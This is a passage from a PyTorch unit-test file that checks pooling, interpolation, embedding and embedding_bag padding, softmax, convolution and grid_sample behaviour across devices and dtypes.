def check(x, *args, **kwargs):
model = torch.nn.MaxPool1d(*args, **kwargs)
ref_model = torch.nn.MaxPool1d(*args, **kwargs, return_indices=True)
self.assertEqual(model(x), ref_model(x)[0])
sizes = [random.sample(range(8, 128), 3) for _ in range(3)]
kernel_sizes = random.sample(range(1, 5), 3)
strides = random.sample(range(1, 5), 3)
dilations = random.sample(range(1, 5), 3)
ceil_modes = [True, False]
for size, kernel_size, stride, dilation, ceil_mode in \
itertools.product(sizes, kernel_sizes, strides, dilations, ceil_modes):
padding = random.sample(range(0, math.floor(kernel_size / 2) + 1), 1)
check(torch.randn(size, device=device, dtype=dtype),
kernel_size, stride, padding, dilation, ceil_mode=ceil_mode)
# Non-contiguous test
tensor = torch.randn(5, 151, 33, device=device, dtype=dtype)[::2, ::3, ::2]
check(tensor, 3, 2, 1, 2, ceil_mode=True)
check(tensor.transpose(1, 2), 3, 2, 1, 2, ceil_mode=True)
@onlyCUDA
def test_max_pool2d(self, device):
def helper(n, c, h, w, ks):
x = torch.randn(n, c, h, w, device='cuda', dtype=torch.float, requires_grad=True)
ref_x = x.detach().clone().cpu().requires_grad_()
pool = torch.nn.MaxPool2d(kernel_size=ks)
y = pool(x)
ref_y = pool(ref_x)
y.sum().backward()
ref_y.sum().backward()
self.assertEqual(y, ref_y)
self.assertEqual(x.grad, ref_x.grad)
helper(2, 8, 4, 4, ks=2)
helper(1, 100000, 32, 32, ks=4)
helper(1, 100000, 1, 4, ks=(1, 4)) # test for max_pool1d
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
def test_max_pool2d_nhwc(self, device, dtype):
def helper(n, c, h, w, kernel_size, stride=None):
if stride is None:
stride = kernel_size
input = torch.randn(n, c, h, w, dtype=dtype, device=device)
input = input.contiguous(memory_format=torch.channels_last).requires_grad_()
grad = torch.randn(n, c, (h - kernel_size) // stride + 1, (w - kernel_size) // stride + 1,
dtype=dtype, device=device)
pool = torch.nn.MaxPool2d(kernel_size, stride, return_indices=True).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.MaxPool2d(kernel_size, stride, return_indices=True).to(device)
out, ind = pool(input)
out.backward(grad)
ref_out, ref_ind = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ind.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_ind.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(ind, ref_ind)
self.assertEqual(input.grad, ref_input.grad)
helper(4, 8, 8, 8, 7)
helper(200, 512, 28, 28, 2)
helper(4, 8, 7, 7, 3, stride=1)
helper(10, 512, 31, 31, 3, stride=2)
helper(1, 129, 8, 8, 3, stride=2)
@onlyCUDA
def test_max_pool2d_indices(self, device):
def helper(n, c, h, w, ks):
if n is None:
x = torch.randn(c, h, w, device='cuda', dtype=torch.float, requires_grad=True)
else:
x = torch.randn(n, c, h, w, device='cuda', dtype=torch.float, requires_grad=True)
ref_x = x.detach().clone().cpu().requires_grad_()
pool = torch.nn.MaxPool2d(kernel_size=ks, return_indices=True)
y, idx = pool(x)
ref_y, ref_idx = pool(ref_x)
y.sum().backward()
ref_y.sum().backward()
self.assertEqual(y, ref_y)
self.assertEqual(idx, ref_idx) # assertEqual implicitly compares shape for tensors
self.assertEqual(x.grad, ref_x.grad)
helper(2, 8, 4, 4, ks=2)
helper(None, 3, 50, 50, ks=5)
def test_upsamplingNearest2d(self, device):
for memory_format in [torch.contiguous_format, torch.channels_last]:
in_t = torch.ones(1, 2, 2, 2, device=device).contiguous(memory_format=memory_format)
in_uint8_t = torch.ones(1, 2, 2, 2, dtype=torch.uint8, device=device).contiguous(memory_format=memory_format)
with warnings.catch_warnings(record=True) as w:
out_t = F.interpolate(in_t, size=4, mode='nearest')
out_uint8_t = F.interpolate(in_uint8_t, size=4, mode='nearest')
self.assertEqual(torch.ones(1, 2, 4, 4, device=device), out_t)
self.assertEqual(torch.ones(1, 2, 4, 4, dtype=torch.uint8, device=device), out_uint8_t)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
# test forward when input's height is not same as width
in_t = torch.ones(1, 2, 2, 1, device=device).contiguous(memory_format=memory_format).requires_grad_()
with warnings.catch_warnings(record=True) as w:
out_t = F.interpolate(in_t, size=(4, 2), mode='nearest')
self.assertEqual(torch.ones(1, 2, 4, 2, device=device), out_t)
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
out_t.backward(torch.randn_like(out_t))
self.assertTrue(in_t.grad.is_contiguous(memory_format=memory_format))
# test backward when input's height is not same as width
input = torch.ones(1, 2, 2, 1, requires_grad=True, device=device).contiguous(memory_format=memory_format)
gradcheck(lambda x: F.interpolate(x, size=(4, 2), mode='nearest'), [input])
gradgradcheck(lambda x: F.interpolate(x, size=(4, 2), mode='nearest'), [input])
input = torch.randn(1, 2, 2, 2, requires_grad=True, device=device).contiguous(memory_format=memory_format)
self.assertEqual(
F.interpolate(input, 4, mode='nearest'),
F.interpolate(input, scale_factor=2, mode='nearest'))
gradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
gradgradcheck(lambda x: F.interpolate(x, 4, mode='nearest'), [input])
# Assert that cpu and cuda handle channels_last memory format in the same way
# https://github.com/pytorch/pytorch/issues/54590
if torch.device(device).type == 'cuda':
for shapes, scale_factor in product([
(2, 2, 3, 4), (2, 3, 4, 5), (3, 1, 2, 2), (1, 5, 3, 2)
], [0.5, 1.5, 2]):
a_cuda = torch.randn(*shapes, device=device).contiguous(memory_format=memory_format).requires_grad_()
a_cpu = a_cuda.detach().cpu().requires_grad_()
with warnings.catch_warnings(record=True):
out_cuda = F.interpolate(a_cuda, scale_factor=scale_factor, mode='nearest')
out_cpu = F.interpolate(a_cpu, scale_factor=scale_factor, mode='nearest')
self.assertEqual(out_cpu.cuda(), out_cuda)
g_cuda = torch.randn_like(out_cuda)
g_cpu = g_cuda.cpu()
out_cuda.backward(g_cuda)
out_cpu.backward(g_cpu)
self.assertEqual(a_cuda.grad, a_cpu.grad)
def test_upsamplingBilinear2d(self, device):
for align_corners in [True, False]:
kwargs = dict(mode='bilinear', align_corners=align_corners)
for memory_format in [torch.contiguous_format, torch.channels_last]:
# test float scale factor up & downsampling
for scale_factor in [0.5, 1.5, 2]:
in_t = torch.ones(1, 2, 2, 2, device=device).contiguous(memory_format=memory_format).requires_grad_()
out_size = int(math.floor(in_t.shape[-1] * scale_factor))
with warnings.catch_warnings(record=True) as w:
out_t = F.interpolate(in_t, scale_factor=scale_factor, **kwargs)
self.assertEqual(torch.ones(1, 2, out_size, out_size, device=device), out_t.data)
# Assert that memory format is carried through to the output
self.assertTrue(out_t.is_contiguous(memory_format=memory_format))
out_t.backward(torch.randn_like(out_t))
self.assertTrue(in_t.grad.is_contiguous(memory_format=memory_format))
input = torch.randn(1, 2, 2, 2, device=device).contiguous(memory_format=memory_format).requires_grad_()
gradcheck(lambda x: F.interpolate(x, out_size, **kwargs), [input])
# Assert that cpu and cuda give same results
if torch.device(device).type == 'cuda':
for shapes in [
(2, 2, 3, 4), (2, 3, 4, 5), (3, 1, 2, 2), (1, 5, 3, 2)
]:
a_cuda = torch.randn(*shapes, device=device).contiguous(memory_format=memory_format).requires_grad_()
a_cpu = a_cuda.detach().cpu().requires_grad_()
with warnings.catch_warnings(record=True):
out_cuda = F.interpolate(a_cuda, scale_factor=scale_factor, **kwargs)
out_cpu = F.interpolate(a_cpu, scale_factor=scale_factor, **kwargs)
self.assertEqual(out_cpu.cuda(), out_cuda)
g_cuda = torch.randn_like(out_cuda)
g_cpu = g_cuda.cpu()
out_cuda.backward(g_cuda)
out_cpu.backward(g_cpu)
self.assertEqual(a_cuda.grad, a_cpu.grad)
@onlyCPU
@dtypes(torch.float, torch.double)
def test_adaptive_pooling_max_nhwc(self, device, dtype):
def helper(n, c, h, w, output_height, output_width, contig):
input = torch.randint(1, 10, (n, c, h, w), device=device, dtype=dtype)
input = input.contiguous(memory_format=torch.channels_last)
grad = torch.randint(1, 10, (n, c, output_height, output_width), device=device, dtype=dtype)
grad = grad.contiguous(memory_format=torch.channels_last)
if not contig:
input = input[:, ::2, :, :]
grad = grad[:, ::2, :, :]
input.requires_grad_(True)
pool = torch.nn.AdaptiveMaxPool2d((output_height, output_width), return_indices=True).to(device)
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_pool = torch.nn.AdaptiveMaxPool2d((output_height, output_width), return_indices=True).to(device)
out, ind = pool(input)
out.backward(grad)
ref_out, ref_ind = ref_pool(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ind.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_ind.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(ind, ref_ind)
self.assertEqual(input.grad, ref_input.grad)
for contig in [True, False]:
helper(4, 8, 10, 10, 7, 7, contig)
helper(4, 8, 9, 14, 5, 8, contig)
helper(4, 8, 11, 11, 1, 1, contig)
def test_embedding_dense_grad(self, device):
embd = nn.Embedding(20, 20).to(device)
weight = embd.weight
def fn_wrapper(device):
def fn(weight):
inp = torch.tensor([[0, 1, 1, 2], [3, 5, 7, 11]], dtype=torch.long).to(device)
return torch.nn.functional.embedding(inp, weight)
return fn
fn = fn_wrapper(device)
_assertGradAndGradgradChecks(self, fn, (weight, ))
def test_embedding_scalar_weight_error(self, device):
indices = torch.rand(2, 2, device=device).long()
weights = [
torch.tensor(1.0, device=device),
torch.tensor(1.0, device=device).reshape(1, 1, 1),
]
for weight in weights:
with self.assertRaisesRegex(RuntimeError, "'weight' must be 2-D"):
torch.nn.functional.embedding(indices, weight)
@dtypesIfCUDA(torch.float16, torch.float64)
@dtypes(torch.float64)
def test_embedding_backward(self, device, dtype):
embedding = nn.Embedding(10, 3, sparse=True)
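# sparse=True makes weight.grad a sparse COO tensor, hence the
# _indices()/_values() inspections below.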
tensor = torch.tensor([[7, 1, 3]])
ones = torch.tensor(1., dtype=dtype).expand(3, 3)
tensorTwice = tensor.repeat(1, 2)
onesTwice = torch.cat((ones, ones))
embedding = embedding.to(dtype=dtype).to(device)
tensor = tensor.to(device)
ones = ones.to(device)
tensorTwice = tensorTwice.to(device)
onesTwice = onesTwice.to(device)
embedding.zero_grad()
embedding(tensor[0]).sum().backward()
self.assertEqual(embedding.weight.grad._indices(), tensor)
self.assertEqual(embedding.weight.grad._values(), ones)
embedding.zero_grad()
embedding(tensor[0]).sum().backward()
embedding(tensor[0]).sum().backward()
self.assertEqual(embedding.weight.grad._indices(), tensorTwice)
self.assertEqual(embedding.weight.grad._values(), onesTwice)
embedding.zero_grad()
embedding(tensor[0]).sum().backward()
tensor[0, 0] = 8
embedding(tensor[0]).sum().backward()
tensorTwice[0, 3] = 8
self.assertEqual(embedding.weight.grad._indices(), tensorTwice)
self.assertEqual(embedding.weight.grad._values(), onesTwice)
@dtypesIfCUDA(*ALL_TENSORTYPES2)
@dtypes(torch.float32)
def test_embedding_padding_idx(self, device, dtype):
embedding = nn.Embedding(10, 20, padding_idx=0).to(device, dtype)
input = torch.tensor([[0, 2, 4, 5], [4, 3, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][0].sum(), 0)
self.assertEqual(output[1][2].sum(), 0)
embedding = nn.Embedding(10, 20, padding_idx=0, sparse=True).to(device, dtype)
input = torch.tensor([[0, 2, 4, 5], [4, 3, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][0].sum(), 0)
self.assertEqual(output[1][2].sum(), 0)
# negative indexing check for padding_idx
# padding_idx=-2, num_embeddings=10 ==> index 8 padded
embedding = nn.Embedding(10, 20, padding_idx=-2).to(device, dtype)
input = torch.tensor([[0, 2, 8, 5], [4, 8, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][2].sum(), 0)
self.assertEqual(output[1][1].sum(), 0)
embedding = nn.Embedding(10, 20, padding_idx=-2, sparse=True).to(device, dtype)
input = torch.tensor([[0, 2, 8, 5], [4, 8, 0, 9]], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[0][2].sum(), 0)
self.assertEqual(output[1][1].sum(), 0)
# change padding vector
padding_vector = torch.ones(20, dtype=dtype, device=device)
embedding = nn.Embedding(10, 20, padding_idx=2, sparse=True).to(device, dtype)
with torch.no_grad():
embedding.weight[2] = padding_vector
input = torch.tensor([0, 2], dtype=torch.long).to(device)
output = embedding(input)
self.assertEqual(output[1], padding_vector)
# out of bounds check for padding_idx
self.assertRaises(AssertionError, nn.Embedding, num_embeddings=10, embedding_dim=20, padding_idx=25)
self.assertRaises(AssertionError, nn.Embedding, num_embeddings=10, embedding_dim=20, padding_idx=-25)
padding_idx = 0
embedding = nn.Embedding(5, 2, padding_idx=padding_idx).to(device, dtype)
for n in (1, 2, 1000): # Need large N to trigger all the methods we have implemented
for other_indices in ([], [1, 3], [2]):
indices = torch.tensor(other_indices + [padding_idx] * n, dtype=torch.long).to(device)
pre = embedding.weight[padding_idx].clone()
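# The gradient w.r.t. the padding row must be zero, so applying the grad
# to the weight must leave that row unchanged.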
embedding(indices).sum().backward()
after = (embedding.weight + embedding.weight.grad)[padding_idx]
embedding.zero_grad()
self.assertEqual(after, pre)
# test double backward
emb_sum = embedding(indices).sum()
emb_grad = torch.autograd.grad(outputs=emb_sum, inputs=list(embedding.parameters()), retain_graph=True)
scalar = emb_grad[0].sum() + emb_sum
scalar.backward()
after = (embedding.weight + embedding.weight.grad)[padding_idx]
embedding.zero_grad()
self.assertEqual(after, pre)
# Check correctness of torch.nn.functional.embedding_bag forward and
# backward functions with padding_idx, given a 1D input separated into bags
# with an offset array. Compare against an equivalent 2D input that uses
# padding indices to fill in the gaps indicated by the offset array
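# A sketch of the equivalence being checked (hypothetical values):
#   indices = [3, 7, 7, 1], offsets = [0, 2]  ->  bags [3, 7] and [7, 1]
#   equivalent 2D form with padding index p and max bag size 3:
#   [[3, 7, p],
#    [7, 1, p]]
# Both reduce to the same per-bag result because entries equal to
# padding_idx are excluded from the reduction.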
@onlyOnCPUAndCUDA
@dtypes(torch.float32, torch.float64)
@dtypesIfCUDA(torch.half, torch.bfloat16)
def test_embedding_bag_1D_padding_idx(self, device, dtype):
num_features = 3
max_indices_per_bag = 10
num_bags = 10
num_words = 100
def gen_1D_indices_offsets(include_last_offset, allpad):
indices = []
offsets = []
cur_offset = 0
# Make one bag full and one bag empty, for extra coverage
empty_bag = random.randint(0, num_bags - 1)
full_bag = empty_bag
while full_bag == empty_bag:
full_bag = random.randint(0, num_bags - 1)
for bag in range(num_bags):
offsets.append(cur_offset)
if bag == full_bag:
bag_size = max_indices_per_bag
elif bag == empty_bag:
bag_size = 0
else:
bag_size = random.randint(1, max_indices_per_bag - 1)
indices += [1 if allpad else random.randint(0, num_words - 1) for _ in range(bag_size)]
cur_offset += bag_size
# embedding_bag requires first entry of offsets to be 0
assert offsets[0] == 0
indices = torch.tensor(indices, device=device)
if include_last_offset:
offsets.append(indices.size(0))
offsets = torch.tensor(offsets, device=device)
return indices, offsets
# Convert a 1-D indices-offsets representation into 2-D. Fill any
# remaining slots in each bag with padding_idx
def gen_2D_indices_from_1D(indices_1D, offsets, include_last_offset, padding_idx):
assert offsets[0] == 0
if include_last_offset:
offsets = offsets[:-1]
indices_2D = torch.empty(num_bags, max_indices_per_bag, device=device, dtype=torch.long)
for bag in range(num_bags):
# Determine the start and end position of the bag within indices_1D
start = offsets[bag]
end = len(indices_1D) if bag + 1 == num_bags else offsets[bag + 1]
end = min(len(indices_1D), end)
# Pull out the bag's indices from indices_1D, and fill any
# remaining space with padding indices
indices_in_bag = []
for item_pos in range(0, max_indices_per_bag):
if (start + item_pos) < end:
indices_in_bag.append(indices_1D[start + item_pos])
else:
indices_in_bag.append(padding_idx)
indices_2D[bag] = torch.tensor(indices_in_bag, device=device)
return indices_2D
test_cases = product(['max', 'mean', 'sum'], [False, True], [False, True], [False, True])
for mode, sparse, include_last_offset, allpad in test_cases:
# Max sparse and bfloat16 are not supported
if mode == 'max':
if sparse or (dtype == torch.bfloat16):
continue
indices_1D, offsets = gen_1D_indices_offsets(include_last_offset, allpad)
for padding_idx_1D in list(set(indices_1D.tolist())) + [None]:
msg = (
f"mode: '{mode}', sparse: {sparse}, include_last_offset: {include_last_offset}, "
f"padding_idx_1D: {padding_idx_1D}")
# If 1D input does not use a padding index, we still need one for the 2D input,
# so we can add one dummy word to the weights to act as the padded word
padding_idx_2D = padding_idx_1D if padding_idx_1D is not None else num_words
num_words_with_padding = num_words if padding_idx_1D is not None else num_words + 1
indices_2D = gen_2D_indices_from_1D(
indices_1D,
offsets,
include_last_offset,
padding_idx_2D)
weights = torch.randn(
num_words_with_padding,
num_features,
dtype=dtype,
device=device,
requires_grad=True)
weights_check = weights.clone().detach().requires_grad_(True)
bag = torch.nn.functional.embedding_bag(
indices_1D,
weights,
offsets,
padding_idx=padding_idx_1D,
mode=mode,
sparse=sparse,
include_last_offset=include_last_offset)
bag_check = torch.nn.functional.embedding_bag(
indices_2D,
weights_check,
padding_idx=padding_idx_2D,
mode=mode,
sparse=sparse)
self.assertEqual(bag, bag_check, msg=msg)
bag.sum().backward()
bag_check.sum().backward()
# Sometimes, half dtype gradients mismatch by a greater amount
# than other dtypes
if dtype in [torch.half, torch.bfloat16]:
atol = 0.01
rtol = 0.01
else:
atol = None
rtol = None
self.assertEqual(weights.grad, weights_check.grad, msg=msg, atol=atol, rtol=rtol)
# Check correctness of torch.nn.functional.embedding_bag forward and
# backward functions with padding_idx, given a 2D indices input. Compare
# against torch.nn.functional.embedding followed by a reduction.
@onlyOnCPUAndCUDA
@dtypes(torch.float32, torch.float64)
@dtypesIfCUDA(torch.half, torch.bfloat16)
def test_embedding_bag_2D_padding_idx(self, device, dtype):
# Use a Python implementation of embedding_bag with padding_idx support
# to check torch.nn.functional.embedding_bag correctness
def embedding_bag_check(indices, weights, mode, sparse, padding_idx):
assert padding_idx is not None
embedding = torch.nn.functional.embedding(
indices,
weights,
padding_idx=padding_idx,
sparse=sparse)
reduction_dim = indices.dim() - 1
if mode == 'sum' or mode == 'mean':
# We must avoid including elements at padding_idx in the
# sum/mean, so multiply those elements by 0, and multiply
# all other elements by 1
per_sample_weights = indices.ne(padding_idx).to(dtype).unsqueeze(-1)
res = embedding.mul(per_sample_weights).sum(dim=reduction_dim)
if mode == 'mean':
weights_sum = per_sample_weights.sum(dim=reduction_dim)
res = res.div(weights_sum)
elif mode == 'max':
# We must avoid allowing elements at padding_idx to be chosen
# as the max, so set those elements to negative infinity
res = embedding.masked_fill(
indices.unsqueeze(-1) == padding_idx, -float('inf')
).amax(dim=reduction_dim)
else:
raise RuntimeError(f"mode '{mode}' is not available")
# If a row is all padding, set its corresponding result row to 0.
# This is needed because the above mean and max mode
# implementations set these elements to nan and -inf, respectively
if mode in ['mean', 'max']:
res = res.masked_fill(
indices.eq(padding_idx).all(dim=-1).unsqueeze(-1),
0)
return res
num_features = 3
num_words = 10
indices_dim1 = 10
for mode, sparse, allpad, indices_dim0 in product(['max', 'mean', 'sum'], [False, True], [False, True], [1, 10]):
# Max sparse and bfloat16 are not supported
if mode == 'max':
if sparse or (dtype == torch.bfloat16):
continue
if allpad:
indices = torch.empty(indices_dim0, indices_dim1, dtype=torch.long, device=device).fill_(1)
else:
indices = torch.randint(0, num_words, (indices_dim0, indices_dim1), device=device)
if indices_dim0 > 1:
# Fill one row with duplicate index so we can test with a fully
# padded row
duplicate_row = random.randint(0, indices_dim0 - 1)
indices[duplicate_row] = indices[duplicate_row][0]
for padding_idx in list(set(indices.flatten(0, -1).tolist())):
weights = torch.randn(num_words, num_features, dtype=dtype, device=device, requires_grad=True)
weights_check = weights.clone().detach().requires_grad_(True)
msg = (
f"mode: '{mode}', sparse: {sparse}, padding_idx: {padding_idx}, "
f"allpad: {allpad}, indices.size(): {indices.size()}")
# Check forward with a Python implementation of padding_idx embedding_bag
bag_check = embedding_bag_check(
indices,
weights_check,
mode,
sparse,
padding_idx)
bag = torch.nn.functional.embedding_bag(
indices,
weights,
padding_idx=padding_idx,
mode=mode,
sparse=sparse)
self.assertEqual(bag, bag_check, msg=msg)
bag_check.sum().backward()
grad_check = weights_check.grad
bag.sum().backward()
grad = weights.grad
# Sometimes, half dtype gradients mismatch by a greater amount
# than other dtypes
if dtype in [torch.half, torch.bfloat16]:
atol = 0.01
rtol = 0.01
else:
atol = None
rtol = None
self.assertEqual(grad, grad_check, msg=msg, atol=atol, rtol=rtol)
# Test fails on Vg20
@skipCUDAIfRocm
@dtypesIfCUDA(torch.half, torch.float)
@dtypes(torch.float)
def test_softmax_results(self, device, dtype):
# Non-even sizes and non-zero shifts test fallback paths in vectorized kernel
# Note: dim1 > 1024 is needed to exercise the vectorized (non-persistent) path; (16, 30576) is BERT-esque
sizes = [(0, 10), (32, 20), (10, 0), (31, 20), (32, 21), (31, 23), (32, 1536), (31, 2048), (33, 2049), (16, 30576)]
shifts = [(0, 0), (1, 0), (0, 1), (1, 1)]
for fn in [F.softmax, F.log_softmax]:
for size in sizes:
for shift in shifts:
input = torch.rand(size, device=device, dtype=dtype)
# Note: With the largest tests we can hit upper limit of fp16 when we
# sum, so scale the input down to stay in a nicer range.
if dtype == torch.float16:
input = input / 100.
input = input[shift[0]:, shift[1]:]
# Note: don't want to backprop through the slice op
input = input.detach().requires_grad_(True)
ref_input = input.clone().cpu().detach().requires_grad_(True)
for dim in [0, 1]:
ref_output = fn(ref_input, dtype=torch.float, dim=dim)
output = fn(input, dtype=torch.float, dim=dim)
grad_output = torch.rand(size, device=device, dtype=dtype)
grad_output = grad_output[shift[0]:, shift[1]:]
ref_grad_output = grad_output.clone().cpu().detach()
grad_input, = torch.autograd.grad(output, input, grad_outputs=(grad_output), create_graph=True)
ref_grad_input, = torch.autograd.grad(ref_output, ref_input,
grad_outputs=(ref_grad_output), create_graph=True)
grad_input.sum().backward()
ref_grad_input.sum().backward()
self.assertEqual(output, ref_output)
self.assertEqual(grad_input, ref_grad_input)
self.assertEqual(input.grad, ref_input.grad)
@onlyCUDA
@dtypesIfCUDA(torch.float, torch.half)
@largeTensorTest("20GB")
@precisionOverride({torch.half: 0.001})
def test_softmax_64bit_indexing(self, device, dtype):
def run_test(*shape):
x = torch.randn(shape, device="cuda", dtype=torch.float16, requires_grad=True)
y = F.log_softmax(x, dim=-1, dtype=dtype)
y.backward(y)
with torch.no_grad():
xx = x.cpu().requires_grad_()
yy = F.log_softmax(xx.float(), dim=-1).to(dtype)
yy.backward(yy)
self.assertEqual(y, yy)
self.assertEqual(x.grad, xx.grad)
run_test(1100000000, 2) # Illegal memory access https://github.com/pytorch/pytorch/issues/52715
run_test(2200000000, 1) # invalid configuration argument https://github.com/pytorch/pytorch/issues/52716
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.half)
def test_log_softmax_big(self, device, dtype):
def _test_helper(shape):
# generate a tensor with big numbers that are exactly representable in dtype
# and are at a constant offset from tensor with small numbers
# the logsoftmax of a small and big tensors should be equal
x_small = torch.randint(100, shape, dtype=dtype, device=device)
offset = 1.5e3 if dtype == torch.half else 1e7
x_big = x_small + offset
self.assertEqual(F.log_softmax(x_small, -1), F.log_softmax(x_big, -1))
_test_helper((16, 4))
if self.device_type == 'cuda':
# test non-persistent softmax kernel
_test_helper((4, 1536))
@onlyCUDA
@largeTensorTest('12GB')
def test_conv_large_nosplit(self, device):
# Here we just test that the convolution correctly routes to the fallback
# implementation, i.e. that it does not crash. The correctness of the fallback
# implementation should be covered by other tests
dtype = torch.half if self.device_type == 'cuda' else torch.float
conv1 = nn.Conv2d(2, 2, 8, 8).to(device).to(dtype)
input_large = torch.randn(1, 2, 1024, 1024 * 1024, dtype=dtype, device=device)
conv1(input_large)
conv2 = torch.nn.Conv2d(1, 1024, 1, 1).to(device).to(dtype)
input_large = torch.randn(1, 1, 2048, 1024 , dtype=dtype, device=device)
conv2(input_large)
def test_conv_noncontig_weights(self, device):
for dim in (1, 2, 3):
for grouped in (False, True):
nc = 3
groups = 3 if grouped else 1
w = torch.randn([3] * dim, device=device)
w = w.expand([nc, int(nc / groups)] + list(w.shape))
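# expand() yields a non-contiguous weight (zero stride along the expanded
# dims), exercising the non-contiguous-weight code path.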
w = w.detach().requires_grad_()
x = torch.randn([1, nc] + ([5] * dim), device=device, requires_grad=True)
y = getattr(F, 'conv{}d'.format(dim))(x, w, groups=groups)
y.sum().backward()
y = getattr(F, 'conv_transpose{}d'.format(dim))(x, w, groups=groups)
y.sum().backward()
def test_conv_noncontig_weights_and_bias(self, device):
# need floats to exercise https://github.com/pytorch/pytorch/issues/16018
for bias in [True, False]:
conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=bias).to(device, torch.float)
input_nc = torch.randn((1, 3, 224, 224, 2), device=device, dtype=torch.float)[:, :, :, :, 1]
input_c = input_nc.contiguous()
weight_nc = torch.randn((64, 3, 7, 7, 2), device=device, dtype=torch.float)[:, :, :, :, 1]
conv1.weight = nn.Parameter(weight_nc)
weight_c = conv1.weight.contiguous()
if bias:
bias_nc = torch.randn((64, 2), device=device, dtype=torch.float)[:, 1]
conv1.bias = nn.Parameter(bias_nc)
bias_c = conv1.bias.contiguous()
out1 = conv1(input_nc)
conv1.weight = nn.Parameter(weight_c)
if bias:
conv1.bias = nn.Parameter(bias_c)
out2 = conv1(input_c)
self.assertEqual(out1, out2)
def test_save_lstm_compatibility(self, device):
# Test that saving an LSTM in PyTorch 1.7 and older can still be
# loaded in newer versions of PyTorch.
model = nn.LSTM(2, 3)
x = torch.randn(32, 5, 2)
expected = model(x)
# Get a state dict for PyTorch 1.7 LSTM. Before PyTorch 1.8, proj_size
# didn't exist.
assert model.proj_size == 0
state_dict = model.__dict__
del state_dict['proj_size']
# load a model
loaded_model = nn.LSTM(2, 3)
loaded_model.__setstate__(state_dict)
result = loaded_model(x)
self.assertEqual(result, expected)
@onlyCUDA
@tf32_on_and_off(0.005)
def test_grid_sample_large(self, device):
def issue_35202():
input_tensor = torch.rand(1, 1, 480, 640, dtype=torch.float, device=device, requires_grad=True)
coords = torch.tensor([[-10059144, 67680944], [67680944, 67680944]], dtype=torch.float, device=device)
coords = coords.unsqueeze(0).unsqueeze(0).repeat(1, 1, 1, 1)
result = torch.nn.functional.grid_sample(input_tensor, coords)
self.assertEqual(result, torch.tensor([[[[0., 0.]]]], dtype=torch.float, device=device))
result.backward(torch.ones_like(result))
torch.cuda.synchronize()
issue_35202()
def issue_24823_1(dtype):
image = torch.arange(27, 0, -1, dtype=dtype, device=device).view(1, 1, 3, 3, 3)
image.requires_grad_()
grid = torch.nn.functional.affine_grid(
torch.tensor([[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0]]], dtype=dtype, device=device),
(1, 1, 3, 3, 3))
grid[:, 1, 1, 1, 0] = float('inf')
result = torch.nn.functional.grid_sample(image, grid, padding_mode='zeros')
self.assertEqual(result, torch.tensor([[[[[27., 26., 25.], [24., 23., 22.], [21., 20., 19.]],
[[18., 17., 16.], [15., 0., 13.], [12., 11., 10.]],
[[9., 8., 7.], [6., 5., 4.], [3., 2., 1.]]]]],
device=device, dtype=dtype))
result.backward(torch.ones_like(result))
expected_grad = torch.ones_like(image)
expected_grad[0, 0, 1, 1, 1] = 0
self.assertEqual(image.grad, expected_grad, atol=0.005, rtol=0)
issue_24823_1(torch.half)
issue_24823_1(torch.float)
issue_24823_1(torch.double)
def issue_24823_2():
param = torch.tensor([[[-1.0e+20, 0.0, 0.0], [0.0, -1.0e+20, 0.0]]], dtype=torch.float, device=device)
img = torch.zeros((1, 1, 4, 4), dtype=torch.float, device=device, requires_grad=True)
grid = torch.nn.functional.affine_grid(param, img.size())
result = torch.nn.functional.grid_sample(img, grid)
self.assertEqual(result, torch.zeros(1, 1, 4, 4, device=device, dtype=torch.float))
result.backward(torch.ones_like(result))
torch.cuda.synchronize()
issue_24823_2()
@dtypes(torch.float, torch.double)
@largeTensorTest(lambda self, device, dtype:
# Compute sum of the large tensor sizes:
# (im.numel() + small_image.numel() + small_image.grad.numel() +
# large_view.grad.numel()) * sizeof(dtype)
32769 * (65536 + 3 * 65536 / 128) *
torch.tensor([], dtype=dtype).element_size())
def test_grid_sample_large_index_2d(self, device, dtype):
# Test 64-bit indexing with grid_sample (gh-41656)
        # Try accessing the corners; there should be no segfault
coords = torch.tensor([[[-1., -1.],
[+1., -1.]],
[[-1., +1.],
[+1., +1.]]], device=device, dtype=dtype)
coords = coords.expand(1, 2, 2, 2)
        im = torch.zeros([1, 1, 32769, 65536], device=device, dtype=dtype)
        result = F.grid_sample(im, coords, align_corners=False)
        self.assertEqual(result, torch.zeros((1, 1, 2, 2), device=device, dtype=dtype))
        # Compare sampling with large strides to the same op on a contiguous tensor
coords = torch.rand(1, 4, 4, 2, device=device, dtype=dtype)
large_view = im[..., 127::128]
small_image = torch.rand_like(large_view)
large_view[...] = small_image
large_view.requires_grad, small_image.requires_grad = True, True
self.assertTrue(
sum(i * s for i, s in zip(large_view.size(), large_view.stride())) >= 2 ** 31,
msg="View must use 64-bit indexing")
for mode, padding_mode, align_corners in itertools.product(
('nearest', 'bilinear', 'bicubic'), ('zeros', 'border', 'reflection'), (True, False)):
a = F.grid_sample(
small_image, coords, mode=mode,
padding_mode=padding_mode, align_corners=align_corners)
a.sum().backward()
b = F.grid_sample(
large_view, coords, mode=mode,
